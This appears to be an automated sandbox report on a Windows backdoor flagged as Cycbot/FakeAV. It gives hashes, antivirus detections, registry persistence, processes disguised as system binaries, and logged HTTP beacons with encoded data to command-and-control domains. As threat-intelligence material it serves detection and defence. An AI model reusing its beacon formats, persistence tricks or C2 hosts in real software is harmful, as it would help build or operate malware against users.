Analysis Date: 2014-07-02 22:56:32
MD5: fd904f785d8a3caed56b47c197254c40
SHA1: e9e1b90d26ce1573d17a9ec7ecb8f6489f4e0c72

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 93517ab5c7fe079ccee1371b1c2e7338 sha1: d1eec0820cf2128ad4ec372130208552de6f7f02 size: 173568
Section: .rdata md5: 608252ae6ddf347183e994a19f0df615 sha1: 059fa071f139485eeb3a5929f4b9a56a3716281d size: 2560
Section: .data md5: 71a5c317089d34884f3087411375d9e8 sha1: e3473b315c04d6942cd7a4edf7bb902b2dec8520 size: 20480
Section: .crt md5: f81940dcd59f615e26526363e57b4899 sha1: e688c1d510ec0bc42ad94d3eba6b34089508b251 size: 512
Timestamp: 2005-09-30 17:14:59
Version: PrivateBuild: 1520
PEhash: 797c17d85c09fd5e6c2a354a44ee0e3e6f947d1a
IMPhash: 6756e0c90847d34db4c907e34233acfb
AV: 360 Safe - Gen:Trojan.Heur.KS.1
AV: Ad-Aware - Gen:Trojan.Heur.KS.1
AV: Alwil (avast) - Cybota [Trj]
AV: Arcabit (arcavir) - no_virus
AV: Authentium - W32/Goolbot.E.gen!Eldorado
AV: Avira (antivir) - TR/Agent.psa.35
AV: CA (E-Trust Ino) - Win32/FakeSpypro.B!generic
AV: CAT (quickheal) - Backdoor.Cycbot.B
AV: ClamAV - Win.Trojan.Agent-100634
AV: Dr. Web - Trojan.DownLoader1.60509
AV: Emsisoft - Gen:Trojan.Heur.KS.1
AV: Eset (nod32) - Win32/Kryptik.KFV
AV: Fortinet - W32/FakeAV.PACK!tr
AV: Frisk (f-prot) - W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AV: F-Secure - Trojan-Downloader:W32/Agent.DQLH
AV: Grisoft (avg) - Cryptic.CCK
AV: Ikarus - Gen.Variant.Kazy
AV: K7 - Backdoor ( 003210941 )
AV: Kaspersky - Trojan.Win32.Generic
AV: MalwareBytes - Spyware.Passwords.XGen
AV: Mcafee - BackDoor-EXI.gen.h
AV: Microsoft Security Essentials - Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan) - Gen:Trojan.Heur.KS.1
AV: Rising - Trojan.Win32.Generic.127C5600
AV: Sophos - Mal/FakeAV-IS
AV: Symantec - Trojan.Gen.2
AV: Trend Micro - BKDR_CYCBOT.SMIB
AV: VirusBlokAda (vba32) - Malware-Cryptor.Limpopo

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates Mutex: {C66E79CE-8005-4ed9-A6B1-4983619CB922}
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 127.0.0.1
Winsock DNS: zonetk.com
Winsock DNS: zonere.com
Winsock DNS: remotesupportsystem.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: remotesupportsystem.com
Type: A
69.13.210.253
DNS: zonetf.com
Type: A
208.73.210.205
DNS: zonetf.com
Type: A
208.73.210.203
DNS: zonetf.com
Type: A
208.73.211.249
DNS: zonetf.com
Type: A
208.73.211.246
DNS: zonetf.com
Type: A
208.73.211.173
DNS: zonere.com
Type: A
8.5.1.39
DNS: zonetk.com
Type: A
HTTP GET: http://remotesupportsystem.com/images/rssuni_small.gif?tq=gP4aKydXicJg0ehEHp1p41wb0Q3AW1oOPgf7Lh%2F1RvvUrAiNIWcoecy0TxR5eEBuqhrs7KZjTK%2BMXG2euVOFqSHQqvXp%2BLxLNHGv0WMHwU%2Bv%2BZkhANUoj%2B5X%2FvT6%2F0%2FNB75sAtfLw23npg08In15SJPxbcMTnk0cOlLLl2aWaXybgEvZMK6g%2FaRGGcLc%2BFWg8sE0saGP3g3zrtcfWfpFyaI%2BIXX9O%2FvCS5sQcAqgP4MXRCD2sONRzw7Co34ed6HoazMF%2FQOwqI7vbssGW%2BrqJFz4vh2n0dk8aDr8b06nQ3LjRSg3eXN5%2BB2Kl%2FaAbQQkbQRe6S3tJuEb7dmxLD6nYLOeS5rSa8TKlDHRiSMqcVvAh0Hckn6agMCe%2B3xD5JzUAEU%2FbdCGSTT4LAKgyuW8drbxxg18%2Fe6sz6AOvbgpzR5sAo3l99V0ZRg%2Byc%2Bm2kw5HNUokzu8H2nFJVWTM%2F%2FpalZvKUVnkCbiFnX0EO0lVrnpuvwTpacFqQPrBwApRhFRytRaVT7NnXBC3dMLa21vP6JafXJSHo1tZKKCgrKdDj73rIylo8RPRKPkry3MNA0eBkLUs9p7y3fvUXrHbU5N6ppxvoT%2BqRJMxjb4DyhR
User-Agent: iamx/3.11
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GET: http://zonere.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvEo1OjbwvgS917V65rJqlLfgPiWW1cg
User-Agent: iamx/3.11
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJoX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 69.13.210.253:80
Flows TCP: 192.168.1.1:1032 ➝ 208.73.210.205:80
Flows TCP: 192.168.1.1:1033 ➝ 8.5.1.39:80
Flows TCP: 192.168.1.1:1034 ➝ 208.73.210.205:80
Flows TCP: 192.168.1.1:1035 ➝ 208.73.210.205:80

Raw Pcap

Strings